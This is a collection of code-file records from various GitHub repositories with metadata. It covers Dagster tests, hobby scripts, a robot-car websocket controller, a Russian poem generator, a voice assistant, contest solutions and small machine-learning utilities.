timestamp=100.0, daemon_type=SensorDaemon.daemon_type(), daemon_id=None, errors=None\n )\n )\n results = execute_dagster_graphql(graphql_context, INDIVIDUAL_DAEMON_QUERY)\n\n scheduler_required = isinstance(graphql_context.instance.scheduler, DagsterDaemonScheduler)\n assert results.data == {\n \"instance\": {\n \"daemonHealth\": {\n \"id\": \"daemonHealth\",\n \"sensor\": {\n \"daemonType\": \"SENSOR\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": 100.0,\n },\n \"run_coordinator\": {\n \"daemonType\": \"QUEUED_RUN_COORDINATOR\",\n \"required\": False,\n \"healthy\": None,\n \"lastHeartbeatTime\": None,\n },\n \"scheduler\": {\n \"daemonType\": \"SCHEDULER\",\n \"required\": scheduler_required,\n \"healthy\": False if scheduler_required else None,\n \"lastHeartbeatTime\": None,\n },\n }\n }\n }\n\n def test_get_all_daemons(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n results = execute_dagster_graphql(graphql_context, ALL_DAEMON_QUERY)\n scheduler_required = isinstance(graphql_context.instance.scheduler, DagsterDaemonScheduler)\n\n assert results.data == {\n \"instance\": {\n \"daemonHealth\": {\n \"id\": \"daemonHealth\",\n \"allDaemonStatuses\": [\n {\n \"daemonType\": \"SENSOR\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n {\n \"daemonType\": \"BACKFILL\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n {\n \"daemonType\": \"ASSET\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n ]\n + (\n [\n {\n \"daemonType\": \"SCHEDULER\",\n \"required\": True,\n \"healthy\": False if scheduler_required else None,\n \"lastHeartbeatTime\": None,\n }\n ]\n if scheduler_required\n else []\n ),\n }\n }\n }\n\n def test_get_daemon_error(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n graphql_context.instance.add_daemon_heartbeat(\n DaemonHeartbeat(\n timestamp=time.time(),\n daemon_type=SensorDaemon.daemon_type(),\n daemon_id=None,\n errors=[\n SerializableErrorInfo(message=\"foobar\", stack=[], cls_name=None, cause=None)\n ],\n )\n )\n results = execute_dagster_graphql(graphql_context, DAEMON_HEALTH_QUERY)\n assert results.data[\"instance\"][\"daemonHealth\"][\"sensor\"] == {\n \"lastHeartbeatErrors\": [{\"message\": \"foobar\"}],\n \"healthy\": True,\n }\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql_tests/graphql/test_daemon_health.py","file_name":"test_daemon_health.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"27346756587","text":"import os\nimport shutil\n\n\nx=input('number: ')\npath='C:\\\\Users\\\\Drastis\\\\Desktop\\\\Bleach 1-686(Complete)\\\\Bleach v'+x\nnewpath='C:\\\\Users\\\\Drastis\\\\Desktop\\\\Bleach 1-686(Complete)\\\\v'+x\n\n\narr = os.listdir(path)\n\n\n# print(arr)\ncnt=0\ncnt2=1\nfor j,i in enumerate(arr):\n link = path+\"\\\\\"+i\n arr2 = os.listdir(link)\n if len(arr2)==1:\n link = path+\"\\\\\"+i+'\\\\'+arr2[0]\n arr3 = os.listdir(link)\n arr2 = arr3\n print(i)\n print(arr2)\n # input('')\n for numberer,img in enumerate(arr2):\n if img[-4:] != '.png' and img[-4:] != '.jpg':\n print(img)\n input('@@')\n continue\n cnt2+=2\n old_name=link+'\\\\'+img\n new_name=newpath+'\\\\'+str(cnt2)+'.png'\n shutil.move(old_name, new_name)\n print(new_name)\n\n print(cnt)\n cnt+=1\n\n# os.rename(r'file path\\OLD file name.file type',r'file path\\NEW file name.file type')\n\n\n#v66\n#v70,1,2,47","repo_name":"gianandr4/MANGA_DOWNLOADER","sub_path":"venv/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30557763793","text":"import numpy as np\n\ndef image_histogram_equalization(image, number_bins=500):\n # from http://www.janeriksolem.net/2009/06/histogram-equalization-with-python-and.html\n # get image histogram\n image_histogram, bins = np.histogram(image.flatten(), number_bins, density=True)\n cdf = image_histogram.cumsum() # cumulative distribution function\n cdf = cdf / cdf[-1] # normalize\n\n # use linear interpolation of cdf to find new pixel values\n image_equalized = np.interp(image.flatten(), bins[:-1], cdf)\n\n image_equalized[~np.isfinite(image_equalized)] = 0. \n \n return image_equalized.reshape(image.shape)#, cdf\n\ndef normalize_qv(qv):\n qv_log = np.log(qv * 1e4 + 0.001)\n qv_log_norm = (qv_log - 1.06) / 2.15\n return qv_log_norm","repo_name":"tjvandal/windflow-light","sub_path":"windflow/datasets/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"18229439993","text":"from django.db.models import CharField, DecimalField\nfrom django.utils.translation import gettext_lazy as _\n\nCHOICES = [\n ('CZK', 'CZK'),\n ('EUR', 'EUR'),\n ('USD', 'USD'),\n]\n\n\nclass AmountField(DecimalField):\n\n def __init__(self, *args, **kwargs):\n kwargs['decimal_places'] = kwargs.get('decimal_places', 2)\n kwargs['default'] = kwargs.get('default', 0)\n kwargs['max_digits'] = kwargs.get('max_digits', 19)\n kwargs['verbose_name'] = kwargs.get('verbose_name', _('Amount'))\n super().__init__(*args, **kwargs)\n\n\nclass CurrencyField(CharField):\n\n def __init__(self, *args, **kwargs):\n kwargs['max_length'] = kwargs.get('max_length', 3)\n kwargs['blank'] = kwargs.get('blank', False)\n kwargs['null'] = kwargs.get('null', False)\n kwargs['choices'] = kwargs.get('choices', CHOICES)\n kwargs['default'] = kwargs.get('default', 'CZK')\n kwargs['verbose_name'] = kwargs.get('verbose_name', _('Currency'))\n kwargs['help_text'] = kwargs.get(\n 'help_text',\n _('ISO 4217 defined three letter currency abbreviation')\n )\n super().__init__(*args, **kwargs)\n","repo_name":"just-paja/polocas-napadu-api","sub_path":"accounting/models/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13385314847","text":"#!/home/pi/server\n# coding=utf-8\nimport websocket\nimport lib.basicMovement as move\nimport lib.pictureGet as photo\nimport lib.gpsGet as gps\n\n# 初始参数\nspeed = 50\nmoveTime = 2\n\n\n# webSocket的处理函数\ndef on_message(self, message):\n global speed\n global moveTime\n default = True\n # 简单的重新验证\n if \"success\" in message:\n ws.send('get')\n default = False\n return\n\n if \"fail\" in message:\n ws.send('admin')\n default = False\n return\n\n if \"up\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n move.t_up(speed,moveTime)\n else:\n move.t_up(speed,int(m[1]))\n ws.send('ok')\n default = False\n return\n\n if \"down\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n move.t_down(speed, moveTime)\n else:\n move.t_down(speed, int(m[1]))\n ws.send('ok')\n default = False\n return\n\n if \"left\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n move.t_left(speed, moveTime)\n else:\n move.t_left(speed, int(m[1]))\n ws.send('ok')\n default = False\n return\n\n if \"right\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n move.t_right(speed, moveTime)\n else:\n move.t_right(speed, int(m[1]))\n ws.send('ok')\n default = False\n return\n\n if \"stop\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n move.t_stop(2)\n else:\n move.t_stop(int(m[1]))\n ws.send('ok')\n default = False\n return\n\n if \"changeSpeed\" in message:\n m = message.split(\" \")\n if len(m) <= 1:\n speed = 50\n else:\n speed = int(m[1])\n ws.send('ok')\n default = False\n return\n\n if \"photo\" in message:\n photo.photo()\n ws.send('ok')\n default = False\n return\n\n if \"getGps\" in message:\n GPSInfo = gps.gps_inof()\n ws.send(str(GPSInfo))\n default = False\n return\n\n if default:\n print(message)\n ws.send('not an effective command')\n return\n\n\ndef on_error(self, error):\n print(error)\n\n\ndef on_close(self):\n print(\"ConnectionClosed...\")\n\n\ndef on_open(self):\n ws.send(\"admin\")\n print(\"ConnectionStarted...\")\n\n\nif __name__ == '__main__':\n url = \"ws://localhost:10086\"\n while True:\n try:\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(url,\n on_open=on_open,\n on_message=on_message,\n on_error=on_error,\n on_close=on_close)\n ws.run_forever()\n except Exception as e:\n print(e)\n continue\n","repo_name":"sjjl0/remoteCar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16483839814","text":"# 리스트 a의 크기를 N이라고 할 때, 아래의 시간복잡도는?\ndef proob3(a: list[int]):\n answer = []\n for x in a:\n b = list(map(lambda b: b**x, a))\n print(b)\n for y in b:\n print(set(a))\n if y in set(a):\n answer += y # 에러 발생\n return answer\nprint(proob3([2,3,5,7]))\nO(N^2)\n\n# 해시충돌을 방지하기 위한 코드를 작성하기.\nclass HashSet:\n def __init__(self, table_size = 16, hash_fnc = None):\n if hash_fnc is None:\n self.hash_fnc = hash\n else:\n self.hash_fnc = hash_fnc\n \n self.table_size = table_size\n self.table = [None]*table_size\n \n def add(self, data):\n ind = self.hash_fnc(data) % self.table_size\n if self.table[ind] is None or self.table[ind] == data:\n self.table[ind] = data\n else:\n # 해시 충돌 방지를 위한 코드: self.table[ind]에 다른 값이 있을 때,\n while self.table[ind]:\n ind = (ind+1) % self.table_size\n self.table[ind] = data\n return \n def search(self, data):\n ind = self.hash_fnc(data) % self.table_size\n prob_ind = ind\n while self.table[prob_ind]:\n print('going on')\n if self.table[prob_ind] == data:\n print('found in index: ', prob_ind)\n return True\n prob_ind = (prob_ind + 1) % self.table_size\n # 한바퀴를 순회하였다면... \n if prob_ind == ind:\n break\n\n # 해당 해쉬주소에 값이 없다면, False 리턴\n return False\n\n# hs = HashSet(4)\n# print(hs.table_size)\n# print(hs.table)\n# ind1 = hash('da') % 4\n# ind2 = hash('ak') % 4\n# ind3 = hash('dc') % 4\n# ind4 = hash('dqwe') % 4\n# print(ind1,ind2,ind3,ind4)\n# hs.add('da')\n# print(hs.table)\n# hs.add('ak')\n# print(hs.table)\n# hs.add('dc')\n# print(hs.table)\n# hs.add('dqwe')\n# print(hs.table)\n# hs.search('da')\n# hs.search('ak')\n# hs.search('dc')\n# hs.search('dqwe')","repo_name":"devThinKoki/learning_repo","sub_path":"FASTCAMPUS/NKLCB/2nd/quiz-test/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72180360168","text":"import requests\r\nfrom os.path import exists\r\nfrom os import remove\r\nimport tarfile\r\n\r\ndef data_downloader():\r\n \"\"\"\r\n download the cacm.tar.gz from the given url, and uncompress it.\r\n \"\"\"\r\n url = \"http://dg3rtljvitrle.cloudfront.net/cacm.tar.gz\"\r\n if not exists(\"cacm.tar.gz\") and not exists('cacm'):\r\n cacm = requests.get(url)\r\n with open(\"cacm.tar.gz\",'wb') as file:\r\n file.write(cacm.content)\r\n if not exists(\"cacm\"):\r\n c = tarfile.open('cacm.tar.gz')\r\n c.extractall(path='cacm')\r\n c.close()\r\n remove(r\"cacm.tar.gz\")\r\n\r\n","repo_name":"ZechangSun/cacm_retriever","sub_path":"cacm_downloader.py","file_name":"cacm_downloader.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18092370997","text":"from pprint import pprint\nwith open(\"slepice.txt\", \"r\") as f:\n df = f.read()\n\nnodes = []\nfor i, line in enumerate(df.splitlines()):\n nodes.append((i, int(line[23:27]), int(line[28:33]), int(line[35:40]), int(line.split(\"-\")[2][1:4])))\n\ni = 0\nline = \"\"\nmap_ = [\"\" for _ in range(26)]\nfor node1 in nodes:\n viable_pairs = 0\n viable_pairs2 = 0\n for node2 in nodes:\n if node1 != node2 and node1[2] > 0 and node2[1] - node1[2] >= 0:\n viable_pairs += 1\n if node1 != node2 and node2[3] - node1[2] >= 0:\n viable_pairs2 += 1\n\n if viable_pairs2 > 1:\n map_[node1[4]] += '_'\n elif viable_pairs > 500:\n map_[node1[4]] += '.'\n else:\n map_[node1[4]] += '#'\n\npprint(map_)\n","repo_name":"vojtechjelinek/AoC-2016","sub_path":"22/Python/slepice1.py","file_name":"slepice1.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40648386882","text":"import random as r \r\nprob = {}\r\nl1 = []\r\nl2 = []\r\nfor i in range(10):\r\n\ts = 0\r\n\tp = r.randint(1, 6)\r\n\tl1.append(p)\r\n\tif p == 1:\r\n\t\ts += 1\r\n\t#prob.fromkeys(l1, s + 1)\r\nprint(prob.items())\r\n","repo_name":"ArtemDud10K/Homework","sub_path":"TMSHomeWork-3/z26.py","file_name":"z26.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18072161027","text":"import numpy as np\nimport pickle\nfrom ale_python_interface import ALEInterface\nfrom scipy.misc import imresize, imsave\n\nnp.set_printoptions(linewidth=np.inf)\nnp.set_printoptions(threshold=np.inf)\n\n\nclass Game:\n def __init__(self, state_height, state_width, display_screen=False):\n self.ale = ALEInterface()\n self.ale.setInt(b\"frame_skip\", 4)\n self.ale.setInt(b\"random_seed\", 123)\n self.ale.setBool(b\"display_screen\", display_screen)\n self.ale.loadROM(b\"roms/breakout.bin\")\n self.actions = self.ale.getMinimalActionSet()\n self.score = 0\n self.actions_len = len(self.actions)\n self.screen_width, self.screen_height = self.ale.getScreenDims()\n self.state_width = state_width\n self.state_height = state_height\n self.state_len = self.state_width * self.state_height\n self.make_move(self.actions[0])\n self.make_move(self.actions[1])\n\n def get_state(self):\n screen_data = np.zeros(self.screen_width*self.screen_height,dtype=np.uint8)\n self.ale.getScreen(screen_data)\n screen_data_2D = np.reshape(screen_data, (self.screen_height, self.screen_width))\n resized_screen_data_2D = imresize(\n screen_data_2D, (self.state_height, self.state_width))\n resized_screen_data = np.reshape(\n resized_screen_data_2D, self.state_width * self.state_height)\n return resized_screen_data.astype(dtype=np.float32) / 255.0\n\n def get_state_dims(self):\n return (self.state_width, self.state_height, 1)\n\n def save_state_to_img(self, fn):\n screen_data = np.zeros(self.screen_width*self.screen_height,dtype=np.uint8)\n self.ale.getScreen(screen_data)\n screen_data_2D = np.reshape(screen_data, (self.screen_height, self.screen_width))\n resized_screen_data_2D = imresize(\n screen_data_2D, (self.state_height, self.state_width))\n imsave(fn, resized_screen_data_2D)\n \n def make_move(self, action):\n r = self.ale.act(action)\n self.score += r\n return r\n\n def reset_game(self):\n self.ale.reset_game()\n self.score = 0\n self.make_move(self.actions[0])\n\n def game_over(self):\n return self.ale.game_over()\n\n def play(self):\n while True: \n while not self.game_over():\n self.make_move(self.actions[np.random.randint(0, len(self.actions))])\n print(\"Game Over! Score: %s\" % self.score)\n self.reset_game()\n\n def play_interactive(self):\n \"\"\"\n play using 0,1,2,3\n save using 8\n \"\"\"\n buf = []\n while True:\n S = self.get_state()\n a = int(raw_input())\n if(a == 8):\n with open(\"data.pickle\", \"w\") as f:\n pickle.dump(buf, f)\n break\n if(a > 3 or a is None):\n continue\n r = self.make_move(self.actions[a])\n S_ = self.get_state()\n terminal = self.game_over()\n if terminal:\n self.reset_game()\n buf.append((S, a, r, S_, terminal))\n\nif __name__ == \"__main__\":\n g = Game(84, 84, False)\n g.play_interactive()\n","repo_name":"vojtechcima/drl-breakout","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23727991045","text":"def hello(name):\n newList = []\n name = name.split()\n for item in name:\n newList.append(int(item))\n maxlist = max(newList)\n minlist = min(newList)\n indexMin = newList.index(minlist)\n indexMax = newList.index(maxlist)\n newList[indexMin] = maxlist\n newList[indexMax] = minlist\n return newList","repo_name":"kriba24/cs-coding-backup","sub_path":"Unit 8/Replit Problem Set/Swap Min and Max.py","file_name":"Swap Min and Max.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33999134589","text":"#!/usr/bin/env python3\n# https://atcoder.jp/contests/arc134/tasks/arc134_A?lang=ja\nimport bisect # noqa: F401\nimport heapq # noqa: F401\nimport math # noqa: F401\nimport sys # noqa: F401\nfrom collections import defaultdict, deque # noqa: F401\nfrom functools import lru_cache # noqa: F401\nfrom itertools import (accumulate, combinations, # noqa: F401\n combinations_with_replacement, groupby, permutations,\n product)\nfrom typing import * # noqa: F401\n\ninput = (lambda: sys.stdin.readline().rstrip(\"\\r\\n\"))\n\n\n\ndef chmax(a: Any, b: Any) -> Tuple[Any, bool]:\n if (a < b):\n a = b # aをbで更新\n return (a, True)\n return (a, False)\n\n\ndef chmin(a: Any, b: Any) -> Tuple[Any, bool]:\n if (a > b):\n a = b # aをbで更新\n return (a, True)\n return (a, False)\n\ndef get_need_num(pre, next_, W):\n if next_ < 0:\n return 0\n if pre > next_:\n return 0\n\n tmp = -(-(next_ - pre) // W)\n return tmp\n\n\ndef solve(N: int, L: int, W: int, a: \"List[int]\"):\n pre_empty_index = 0\n next_empty_index = 0\n ans = 0\n for i in range(N):\n next_empty_index = a[i]+W\n ans += get_need_num(pre_empty_index, a[i], W)\n pre_empty_index = next_empty_index\n\n ans += get_need_num(pre_empty_index, L, W)\n print(ans)\n return\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n L = int(next(tokens)) # type: int\n W = int(next(tokens)) # type: int\n a = [int(next(tokens)) for _ in range(N)] # type: \"List[int]\"\n solve(N, L, W, a)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"come2ry/kyopro","sub_path":"Contests/arc134/A/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35223789433","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom math import sqrt\n\nemin = 1\nemax = 150\nn_bins = 50\n\ndef get_invmass_from_data( data ):\n\n # invariant mass is \n # sqrt( m1^2 + m2^2 + 2(E1*E2 + p1\\dot p2) )\n m1sq = np.array([ evt[5]**2 - evt[2]**2 - evt[3]**2 - evt[4]**2 for evt in data])\n m2sq = np.array([ evt[11]**2 -evt[10]**2 -evt[9]**2 - evt[8]**2 for evt in data])\n p1dp2 = 2*np.array([ evt[11]*evt[5] - evt[2]*evt[8] - evt[3]*evt[9] - evt[4]*evt[10] for evt in data])\n\n invmass = np.sqrt(m1sq + m2sq + p1dp2)\n\n return(invmass)\n\ndef plot_files(files):\n\n for each in files:\n if not os.path.exists(each):\n print(\"File '{}' does not exist, skipping\".format(each))\n continue\n\n # load the event\n data = np.loadtxt(each)\n invmass = get_invmass_from_data(data)\n\n bins = np.logspace(np.log10(emin), np.log10(emax), n_bins+1)\n# bins = np.linspace(emin, emax, n_bins+1)\n\n plt.hist(invmass, bins,alpha=0.5, label=each.split(\".\")[0])\n\n plt.legend()\n plt.title(\"Ben's Plot - Do Not Steal\")\n plt.xlabel(\"Invariant Mass [GeV]\",size=14)\n plt.ylabel(\"Counts\",size=14)\n plt.xscale('log')\n plt.yscale('log')\n plt.show()\n plt.close()\n\n# load in flavor pairs\nfiles_flavor = [\"mu_el.txt\", \"two_el.txt\", \"two_mu.txt\"]\n\nfiles_sign = [\"same_sign.txt\", \"opp_sign.txt\"]\n\nplot_files(files_flavor)\nplot_files(files_sign)\n\n","repo_name":"BenSmithers/Analysis","sub_path":"summer_camp/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16897884611","text":"class Checkin(object):\n def __init__(self):\n super(Checkin, self).__init__()\n self.id = None\n self.name = None\n self.latitude = None\n self.longitude = None\n self.when = None\n\n @classmethod\n def from_dict(cls, a_dict):\n it = Checkin()\n it.id = a_dict['id']\n it.name = a_dict['name']\n it.latitude = a_dict['latitude']\n it.longitude = a_dict['longitude']\n it.when = a_dict['when']\n return it\n","repo_name":"dkoepke/checkin","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25729636079","text":"import os\nimport get_poems\nimport gensim\nimport pymorphy2\nimport json\nimport random\n\n# path to check if get_poems has already been done.\npath = './resources/json/poems.json'\nfile = 'resources/json/poems.json'\n\n# list of parts of speech that we don't change\nSTOP_POS = ['CONJ', 'PREP', 'PRCL', 'NPRO', ]\n\n# dict to translate OpenCorpora tags to Universal Tags format (Pymorphy -> model)\nOC_UT_dict = {\n 'ADVB': 'ADV',\n 'NUMR': 'NUM',\n 'ADJF': 'ADJ',\n 'ADJS': 'ADJ',\n 'INFN': 'VERB',\n 'COMP': 'ADV',\n 'PRTF': 'VERB',\n 'PRTS': 'VERB',\n 'GRND': 'VERB',\n 'PRED': 'ADV',\n 'NPRO': 'NOUN'\n}\n\npoems_new = []\n\nif not (os.path.exists(path) and os.path.isfile(file)):\n get_poems.makeFiles()\n\n# get results from previous steps\nwith open(file, 'r') as f:\n poems = json.load(f)\n\nwith open('resources/json/poems_clean.json', 'r') as f:\n poems_clean = json.load(f)\n\n# initialize model and PM analyzer\nmodel = gensim.models.KeyedVectors.load_word2vec_format('resources/model.bin', binary=True)\nmodel.init_sims(replace=True)\n\nmorph = pymorphy2.MorphAnalyzer()\n\n\n# returns a list of similar lemmas from model. If can't find, returns None.\ndef findSimilar(lemma, pos):\n try:\n similar = model.most_similar(lemma)\n # filters similar to get only those words that have the same part of speech\n words = [x[0] for x in similar if x[0].endswith(str(pos))]\n return words\n except:\n # print(lemma, 'is not found')\n return None\n\n\n# gets a word in a particular form and returns most similar in the same form\ndef replace_word(word):\n parsed = morph.parse(word)[0]\n tag = parsed.tag\n pos_oc = str(tag.POS)\n\n # Check if we need to replace that word:\n if pos_oc not in STOP_POS:\n\n # translate it to UT format\n if pos_oc in OC_UT_dict.keys():\n pos_ut = OC_UT_dict[pos_oc]\n else:\n pos_ut = pos_oc\n\n # create lemma\n lemma = str(parsed.normal_form) + '_' + pos_ut\n similars = findSimilar(lemma, pos_ut)\n if similars:\n for similar in similars:\n # gets the normal form of the word\n similar = similar.split('_')[0]\n\n # translate tag from analyzers form to generator form\n new_tag = translate_tag(tag)\n\n # put similar word to initial form\n similar_parsed = morph.parse(similar)[0]\n new_word = similar_parsed.inflect(frozenset(new_tag))\n\n # if successfully, return it\n if new_word:\n return new_word.word\n return None\n else:\n return None\n else:\n return None\n\n\n# simply cast string splitted by commas and spaces to list\ndef translate_tag(tag):\n tag = str(tag).split(' ')\n new_tag = []\n for x in tag:\n new_tag.extend(x.split(','))\n return new_tag\n\n\n# for every poem, we take according poem cleaned, and for every word we try to replace it.\ndef makeNewPoems():\n for i in range(len(poems)):\n poem = poems[i]\n for word in poems_clean[i].split(' '):\n # check if it is a word\n if str.isalpha(word):\n new_word = replace_word(word)\n if new_word:\n # If initial word was capitalized, we capitalize the new word\n if word[0].isupper():\n new_word = new_word.capitalize()\n poem = poem.replace(word, new_word)\n poems_new.append(poem)\n # put all new poem to the json file\n with open('resources/json/poems_new.json', 'w', encoding='utf8') as f:\n json.dump(poems_new, f, ensure_ascii=False)\n\n\n# makeNewPoems()\n\n# returns a random original poem and a generated one.\ndef getTwoPoems():\n if not (os.path.exists('./resources/json/poems_new.json') and os.path.isfile('./resources/json/poems_new.json')):\n makeNewPoems()\n with open('resources/json/poems_new.json', 'r') as f:\n poems_new = json.load(f)\n i = random.randint(0, len(poems) - 1)\n return poems[i], poems_new[i]\n","repo_name":"shitikovaev/Khlebnikov_bot","sub_path":"generate_poems.py","file_name":"generate_poems.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810346355","text":"from dataclasses import replace\r\nfrom datetime import datetime\r\nfrom email.mime import audio\r\nfrom logging import exception\r\nfrom unittest import result\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport wikipedia\r\n\r\nengine = pyttsx3.init(\"sapi5\")\r\nvoice = engine.getProperty(\"voices\")\r\n#print(voice[0].id)\r\nengine.setProperty('voice',voice[1].id)\r\n\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\ndef wishme():\r\n hour = int(datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good morning!\")\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\")\r\n else:\r\n speak(\"Good Evening!\")\r\n\r\n speak(\"I am your robot sir. Please tell me how can i help you\")\r\ndef takecommand():\r\n '''\r\n \r\n '''\r\n #It takes microphone input from the user and return string output\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening....\")\r\n r.pause_threshold = 1\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\")\r\n query =r.recognize_google(audio,language=\"eng-in\")\r\n print(f\"user said: {query}\\n\")\r\n except Exception as e:\r\n #print(e)\r\n\r\n print(\"say that again please....\")\r\n return \"None\"\r\n return query\r\nif __name__==\"__main__\":\r\n wishme()\r\n while True:\r\n query = takecommand().lower()\r\n\r\n #logic for exculting tasks basesd on query\r\n if 'wikipedia' in query:\r\n speak('Searching wikipedia..')\r\n query = query.replace('wikipedia','')\r\n results = wikipedia.summary(query, sentence=2)\r\n speak('According to wikipedia')\r\n print(results)\r\n speak(results)","repo_name":"cadmostafijur/My-Created-Apps","sub_path":"jarves.py","file_name":"jarves.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73421679849","text":"import numpy as np\nimport pandas as pd\n\n\ndef design_matrix(X):\n \"\"\"\n np.array X\n add 1.0 in each line\n\n return matrix of shape(n * (1+p))\n \"\"\"\n n, p = X.shape\n mat = np.ones((n, 1))\n return np.c_[mat, X]\n\n\ndef sigmoid(x):\n \"\"\"\n np.array x\n \"\"\"\n return 1 / (1 + np.exp(-x))\n\n\ndef gradient_ascent(design_mat, y):\n labels = y[:, np.newaxis]\n \n alpha = 0.001\n max_iter = 500\n n, p = design_mat.shape\n weights = np.ones((p, 1))\n # vectorization\n for i in range(max_iter):\n # w_j := w_j - alpha * sigma((sigmoid(w.T*x_i) - y) * x_j)\n # descent: w := w - alpha * X.T * (sigmoid(X*w) - y)\n # ascent: w := w + alpha * X.T * (y - sigmoid(X*w)) \n h = sigmoid(design_mat.dot(weights))\n error = labels - h\n weights = weights + alpha * design_mat.T.dot(error)\n \n return weights\n\n\ndef learning_schedule(t):\n t0, t1 = 5, 50\n return t0 / (t + t1)\n\n\ndef stochastic_gradient_ascent(design_mat, y, max_iter = 500):\n n, p = design_mat.shape\n weights = np.ones((p))\n\n for i in range(max_iter):\n for j in range(n):\n alpha = learning_schedule(i * n + j)\n idx = np.random.randint(n)\n x = design_mat[idx] # design_mat[idx, :]\n label = y[idx]\n h = sigmoid(x[np.newaxis, :].dot(weights))\n weights = weights + alpha * x * (label - h)\n\n return weights\n\n\n\ndef main():\n df = pd.read_csv(test_set, sep=\"\\t\", header=-1)\n X = df[df.columns[:2]]\n y = df[df.columns[-1]]\n design_mat = design_matrix(X)\n weights = gradient_ascent(design_mat, y)\n\n\nif __name__ == \"__main__\":\n test_set = \"F:/MLA/logistic_regression/test_set.txt\"\n main()","repo_name":"chenqumi/MLA","sub_path":"logistic_regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19024480208","text":"# ways to access a particular character of a string.\nimport os\nos.system(\"cls\")\nx= input(\"Enter the string:- \")\n# y= input(\"Enter another string:- \")\n# for i in range(len(x)):\n# if x[i]==y[i]:\n# y= y[0:i]+\"0\"+y[i+1:] # Slicing.\n# print(y)\nx= x.split()\nprint(x[1][1])","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new20.py","file_name":"new20.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9343737800","text":"\"\"\"\nConvert a Matlab matrix file (like those found at sparse.tamu.edu) to scipy sparse .npz file.\n\"\"\"\n\nimport numpy as np\nimport scipy.io\nfrom scipy.sparse import save_npz\n\n\ndef matlab2npy(mlfile):\n d = scipy.io.loadmat(mlfile)\n\n for i in [1, 2, 0]:\n a = d[\"Problem\"][0][0][i]\n try:\n a.data = np.abs(a.data)\n except Exception:\n continue\n else:\n break\n else:\n raise RuntimeError(\"couldn't find the matrix!!!\")\n\n\n nrows, ncols = a.shape\n\n print(\"Nonzeros:\", np.count_nonzero(a.data), \"of\", 